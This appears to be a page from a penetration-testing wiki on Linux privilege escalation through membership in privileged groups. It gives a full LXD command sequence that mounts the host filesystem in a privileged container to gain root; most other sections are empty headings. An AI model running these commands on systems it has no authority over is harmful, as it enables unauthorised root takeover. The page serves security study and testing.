πŸ‘‘Privileged Groups

🎯 Overview

Certain Linux groups provide elevated privileges that can be exploited for privilege escalation through container access, disk manipulation, or administrative file access.

🐳 High-Risk Groups

LXD Group

Impact: Container root = host root

# Check membership
id | grep lxd

# Create privileged container
lxd init  # Use defaults
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
lxc init alpine r00t -c security.privileged=true
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
lxc start r00t
lxc exec r00t /bin/sh

# Access host filesystem as root
cd /mnt/root/root

Docker Group

Impact: Host filesystem access via containers

Disk Group

Impact: Raw device access

ADM Group

Impact: Log file access

πŸš€ Quick Exploitation

LXD Privilege Escalation

Docker Escalation

Other Dangerous Groups

πŸ” Group Enumeration

Check All User Groups

Privileged Group Detection Script

πŸ”‘ Quick Reference

Immediate Checks

Emergency Escalation


Privileged group membership often provides immediate privilege escalation paths - container access, disk manipulation, and administrative file access can lead directly to root privileges.

Last updated